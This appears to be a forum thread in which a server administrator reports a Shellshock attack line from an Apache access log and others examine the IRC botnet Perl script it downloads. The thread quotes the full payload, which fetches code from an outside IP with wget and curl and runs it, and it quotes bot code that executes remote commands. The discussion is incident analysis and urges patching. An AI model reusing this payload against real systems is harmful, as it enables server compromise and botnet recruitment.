I saw the following line under /var/log/apache2/access_log:
"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
I had not gotten around to patching bash yet. I shutdown the machine immediately.
Has anyone seen this on their logs and/or examined the Perl script found at http://213.5.67.223/jurat? It seems fairly benign, but I want to know how worried I should be?
On line 338 you can see the shell function executes a shell command that was fetched from someone on the other end of an IRC channel
my @resp=`$comando 2>&1 3>&1`;
This is executed with the same user level as the apache server. I just hope they were not able to escalate privileges.
I haven't looked at the details, but it doesn't look benign to me:
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
This looks to me like some kind of botnet script. Scary. Get patched up, people.
UPDATE: The analysis in this blog:
If the script is successfully executed then the infected host will connect to an IRC channel hard coded in the script and wait for commands."
That's badder than Baddy McBad.